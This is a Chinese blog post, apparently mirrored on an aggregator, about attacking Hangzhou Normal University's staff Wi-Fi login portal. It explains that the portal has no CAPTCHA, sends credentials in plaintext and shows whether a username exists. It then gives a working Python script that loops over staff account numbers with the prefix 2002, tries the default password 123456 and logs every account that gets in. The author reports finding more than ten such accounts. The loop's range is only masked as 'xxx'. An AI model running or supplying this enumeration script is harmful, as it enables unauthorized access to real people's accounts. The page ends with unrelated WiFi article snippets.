杭师大校园网教职工(hznu-teacher 校园网账号)wifi 账号挖掘~仅供学习使用

news/2025/3/15 4:34:35/

寝室晚上11点断网,原来给学生的hznu 无线学校和电信公司没谈拢。。晚上只能开热点。。这样的话,hznu-teacher 的校园无线网的安全性就岌岌可危

那就来进行一个安全性测试吧

已知: 一个教工账号为 2002xxxx 密码:123456,有这个信息,直接能得到好多账号密码了

笔记本连hznu-teacher 无线,会跳出一个页面 如下:要求输入账号密码的

在检查页面:按F12   填好账号密码后点击登录:

会有一项项的 http header  还有 http body 里的 form-data 里的数据,可以看到是发送的明文

账号xxxx 密码 123456 等等其他, 可以发现提示 账号密码错误了

 

到这里,来梳理下我对这个安全漏洞的检查思路:

首先  是没有验证码,光是这个漏洞就是致命的,因为识别验证码的图灵测试代码的编写就可以劝退99% 的攻击者了

其次,密码这些是明文发送的,肯定会有风险,又抓包工具的估计就可以抓到里面的信息了

然后,这个账号密码 可以看出 使用一个post 方式发出去的,并返回内容。

我们可以根据返回的内容  来判断账号密码正不正确。

除了返回提示  ”账号密码错误“ 外

其实如果你填的 账号不存在 还可以发现 提示 “没有这个账号” 等 

其实,之前我一步一步用jupyter notebook 测试过得,在 requests.post  发送请求得到

输出页面信息 如下:

那个账号不存在也是一样的,那么再加上局域网的验证飞快,我又知道教职工账号的前几位,这就降低了遍历的次数,

好了,放代码吧:python3.6

# -*- coding: utf-8 -*-
"""
Spyder EditorThis is a temporary script file.
"""import requests
import os
s = requests.session()
#print(s.headers)
headers = {'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36','Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8','Host': '172.31.1.5','Referer': 'http://172.31.1.5/srun_portal_pc.php?wlanuserip=172.18.69.34&wlanacname=&wlanuserfirsturl=http://www.hao123.com/&ac_id=6','X-Requested-With':'XMLHttpRequest'}
login_url='http://172.31.1.5/srun_portal_pc.php?wlanuserip=172.18.69.34&wlanacname=&wlanuserfirsturl=http://www.hao123.com/&ac_id=6'
data = {'action':'login',
'username':'20021064',
'password':'123456',
'ac_id':'6',
'user_id':'6',
'user_ip':'172.18.69.34',
'nas_ip':'',
'user_mac':'',
'save_me':'1',
'ajac':'1'}#create a new file to store account
dest = "/home/xxxx/Desktop/blowup.txt"
if os.path.exists(dest) is None:os.mkdirs(dest)
f = open(dest,'w')
f.close() #without this segment,the file won't be created
with open(dest,'a') as fw:fw.write("acount which password is 123456:\n")for i in range(xxx,xxx): #这里填遍历的 账号范围data['username']='2002'+str(i)response = s.post(login_url,data=data,headers=headers)result = response.textprint('account:'+str(i)+":")error_msg = "用户名或密码错误,请重试。"user_not_exist = "用户不存在"if error_msg in response.text:print(error_msg)elif  user_not_exist in response.text:print(user_not_exist)else:print("acount: 2002"+str(i))fw.write("acount: 2002"+str(i)+"\n")

 为了不让别有用心的人滥用这个代码,我把遍历的范围 变成xxx 了,懂得人自然可以填数字进去,账号前缀是2002

好了,结果如下

 这个。。我其实就测试了几百组,就有10几个懒人没有改初始密码,太不应该了,

最后,这个安全漏洞的发现和分享,只是为了传播知识,我们还是不要占用教职工无线网资源,恩恩


http://www.ppmy.cn/news/412797.html

相关文章

WiFi拉近了我们和世界的距离

虽然每天的工作都要面对电脑,可以每天免费WiFi上网,免费下载电影电视和音乐。面对网络,但已经很久没有真正的上过网了。还记得以前用耳朵听网络这个词语的时候,充满了幻想和欣喜。那时候觉得网络是个神奇的机器,能够Wi…

linux开发板 杭州迈冲,杭州迈冲科技MC9G20-DK评估开发板

一、产品简介 迈冲科技MC9G20-DK评估开发板采用MC9G20核心板加评估测试底板双层架构。MC9G20核心板是MC9260核心板的升级版本,与MC9260核心板Pin-to-Pin兼容。采用ATMEL AT91SAM9G20工业级ARM9处理器, 6层PCB板工艺,具有极佳的电气性能和抗干…

WiFi 芯片原厂、模组厂 一文看懂IOT WiFi选择

一:国内常用WiFi原厂 瑞昱 RTL8710、乐鑫 ESP8266、德州仪器 TI cc3200、紫光展锐RDA5981、新干线NL6621、联发科 MT7681、高通 QCA4004。 博通Broadcom Corporation 博通是Wi-Fi芯片一哥,作为领先的半导体厂商,博通在无线领域的优势有目共睹…

国内WiFi模组厂商盘点及发展分析

国内WiFi模组厂商盘点及发展分析 在万物互联的时代,智能硬件的需求也会越来越大。而在智能硬件的普及里,WiFi作为最通用常见的通信手段,最终会孵化出比现在多得多的智能终端。近几年关于WiFi模组的重点正从手机、平板向物联网迁移&#xff0…

浅谈公共场所的免费WiFi

信息时代,许多人已经患上“手机网络依赖症”,车站、码头、机场、地铁、商场等随时随地用手机上网查信息、刷微博,已经成为一种习惯,人们对公共WiFi的需求越来越强烈。许多城市也将公共场所免费WiFi服务提升到建设“无线城市”、“…

星巴克的免费wifi,不再傲娇

几何时,一位朋友曾这样炫耀自己住宅的地理位置优势——我家楼下就是星巴克,我天天蹭他们家的免费wifi,一年省下一两千块钱啊! 那时候,“本店有免费wifi”是少数商家们值得傲娇的资本。现在,免费wifi已经开始…

免费16WiFi被吐槽_16wifi慢慢长路要走

【wifi社区】免费16WiFi”、“信号已覆盖”,这样的字眼,在现如今有着网络依赖症和流量饥渴症的手机用户眼里,简直是“瞌睡了有人递枕头”。但这个免费的枕头,好像一时还难以给人享受的感觉,体验过的人,都感…

wifi定位

wifi定位 支持全国wifi定位 http://www.haoservice.com/docs/10 返回示例 1、wifi位置定位(已过时,建议切换新接口) { "location": { "address": { "region": "江苏省", …